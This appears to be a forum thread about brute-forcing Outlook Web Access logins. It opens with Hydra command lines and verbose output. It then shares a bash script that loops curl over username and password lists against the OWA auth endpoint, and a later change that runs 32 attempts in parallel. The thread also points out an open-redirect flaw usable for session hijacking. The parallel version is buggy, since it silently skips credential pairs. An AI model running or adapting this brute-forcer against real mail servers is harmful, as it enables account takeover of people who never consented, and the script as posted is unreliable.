"302 Moved Temporarily" problem when using Hydra - OWA "Outlook Web Access"

[SherifEldeeb]

I have problems getting results from hydra when testing a OWA-only enabled mail server:

Code:

hydra -l leo -p 123 mail.company.com  https-post-form "/exchweb/bin/auth/owaauth.dll:destination=https%3A%2F%2Fmail.company.com%2Fexchange%2F&flags=0&username=Domain%5C^USER^&password=^PASS^&I1.x=0&I1.y=0:You could not be logged"

then I get a bunch of errors "BAD Request" and false positives.

I got the POST data from running OWASP ZAP as proxy.

here's what happens:
#1- [REQUEST] POST https://mail.company.com/exchweb/bin/auth/owaauth.dll <-- along with the POST data
#1- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail.company.com/exchange/ <-- with a couple of set-cookie's
#2- [REQUEST] GET https://mail.company.com/exchange/
#2- [RESPONSE] HTTP/1.1 302 Moved Temporarily -- Location: https://mail../../owalogon.asp?url=h...ange/&reason=2
#3- I "GET" the same login page with "&reason=2" that will display the error message "You could not be logged..."

The problem is that hydra expects to see in the body of the response the text "You could not be logged" at "#1" to determine if the password is correct or not, and since the response is a 302 without a body, it just assumes that the password has been found and not follow the 302 directions till it gets an actual body in a reply.

any ideas? "i tried owabf.py, it just didn't work for me, all false positives"
Thanks in advance.

[thorin]

What happens if you make your failure string "reason" or "reason=2"?

Instead of targeting the web interface is there a POP3 or IMAP interface you could bruteforce?

[SherifEldeeb]

Won't(didn't) work since Hydra will look for it in the body, not URI, also hydra doesn’t even follow the redirection to the stage where “reason=2” shows up.
Let me show you the output with –v:

Code:

Hydra v6.2 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-04-21 03:49:33
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 443
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for mail.company.com (waiting for children to finish)
HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://mail.company.com/exchange/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sessionid=4df5a08a-c477-48d9-xxxx-c919cc4b7b06; path=/
Set-Cookie: cadata="1++akuxxxY3baBWj2fxxxxxYjaL5stueaBcOIqvJmJ6rVWKepNtA=="; HttpOnly; secure; path=/
Date: Thu, 21 Apr 2011 02:49:35 GMT
Connection: close

As you can see, it just looked at the reply, and didn’t follow…

HOWEVER, you gave me an excellent idea, will use “302 Moved” as the failure string hoping that the reply will change if I’m successful “even though I believe OWA decided I don’t have the right to view https://mail.company.com/exchange/ using GET with the given cookies at the second redirect, not this one”, will install exchange and OWA on my lab to test and will keep you informed.

and regarding your second question, it’s only OWA enabled.

In the meantime, anyone else have ideas about brute-ing OWA ?

[SherifEldeeb]

More on the "help-you-so-you-might-help-me" information:
The " https://mail.company.com/exchange/" comes from the POST data parameter "destination=https%3A%2F%2Fmail.company.com%2Fexch ange%2F" which is mandatory "i.e. when I removed it from the POST data at the intercepting-proxy, or making it 'destination=&...' it gave me 400 Bad Request".

and when I modify it to something like "google.com" it 302 redirect me to google.com! with the set cookies!!!! "that's a damn serious issue with that web application that could be used to hijack sessions among other things!!! but let's focus on the brute forcing".

So, I believe the 302 redirection will ALWAYS happen.

help, ...please, anyone?.

"P.S. will open owabf.py and see how it works(not), even though I'm not good at python."
EDIT: owabf.py checks in the body of the reply for a string that indicates a "STANDARD" image file href known to be there when rejected, ...modified and still not working"

EDIT: I'll just write my own bash script that uses "cURL -L -s" and do it myself will post it here once I get it done ...

[SherifEldeeb]

I did a very simple bash script (i'm by no means a pro) that did what I want, I'm sharing this so maybe someone else might find anything useful in it.
however, it is S L O W (no multi threading), lack error handling, has lots of hard coded data in it, and the output is not very descriptive when a successful user:pass is found.
if you want to use it, change the post data since mine was slightly modded from the std, and make sure its http/https.

Code:

script.sh usernames passlist mail.company.com

it uses 'curl'
-d "POST data" <-- this is where the user & pass will go, I did two nested for loops to go through the lists.
-L to follow the 302 redirects
-s to be silent and not display the HTTP headers
then piped the output to grep to show if a certain sentence I know that it exists in the inbox page shows up.


Stupid, but works.

Code:

#!/bin/bash
show_help(){
echo YAOWAB "Yet another Outlook Web Access Brute-forcer"
echo Usage: $0 USERNAME_LIST PASSWORD_LIST WEBMAIL_SITE
echo by sherif eldeeb.
}

########## STANDARD CHECKS BEFORE STARTING #########

#checking number of arguments, if less than 3, exit!
if [ $# -lt 3 ]
then
  echo [-] ERROR: Arguments are less than 3
  echo
  show_help;
  exit 1
fi

#checking the existence of username file,
if [ -f $1 ] 
then 
  echo[*] Using $1 as username list
else
	echo [-] ERROR: Username file doesn\'t exist
	echo
	show_help;
	exit 1
fi

#checking the existence of passwords file, 
if [ -f $2 ] 
then 
   echo[*] Using $2 as username list
else
	echo [-] ERROR: Passwords file doesn\'t exist
	echo
	show_help;
	exit 1
fi

# curl check
which curl>/etc/null
if [ $? -ne 0 ] ; then
	echo '[-] ERROR: 'curl' not found! exiting...'
	exit
fi

############ END OF STANDARD CHECKS   ##############

echo[*] Starting...
for k in $(cat $1)
do
	for i in $(cat $2)
	do
		echo[*] Trying \"$k\" with password \"$i\"...
		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
	done
done

[SherifEldeeb]

This is going to be my last question in this thread:
Is there a way to make the bash script always have 16 instance of curl running "like hydra" to speed thing up?

adding the "&" to the end of line will choke the machine and will fail "will send all the user pass pairs AT ONCE", and doing a for loop with 16 will wait till ALL the 16 are done then it initialize the next 16 batch, right?

[SherifEldeeb]

Even though it is very, very obvious that I'm probably talking to myself regarding my own issue here on the forum, I'll list a solution I found that enabled me to run 32 instances of curl at once, then back off if the number of curl processes exceeded 32, then launch another 32 curl again, the concept applies to anything "bash-able".

just modify the following lines

Code:

for k in $(cat $1)
do
	for i in $(cat $2)
	do
		echo[*] Trying \"$k\" with password \"$i\"...
		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn"
	done
done

to look like this

Code:

for k in $(cat $1)
do
	for i in $(cat $2)
	do
		CurlCount=$(pidof curl | wc -w)
                [ $CurlCount -ge 32  ] && continue
		echo[*] Trying \"$k\" with password \"$i\"...
		curl -d "destination=https%3A%2F%2F$3%2Fexchange&flags=0&username=$k&password=$i&I1.x=0&I1.y=0" https://$3/exchweb/bin/auth/owaauth.dll -L -s -b cookies.txt | grep -i "This page uses frames, but your browser doesn" &
	done
done

Please note the "&" at the end of the long curl command...

That did the trick, I got very good results "speed was very comparable to hydra after adding the target domain to /etc/hosts snice it was DNS resolving it EVERYTIME".

I'm a happy man again.

P.S: I am pretty sure there's a much {easier, faster, better} way to do it, but I only know little bash, and that's it.
P.S: I just realized that I have to add another "break" statement... will modify this post later...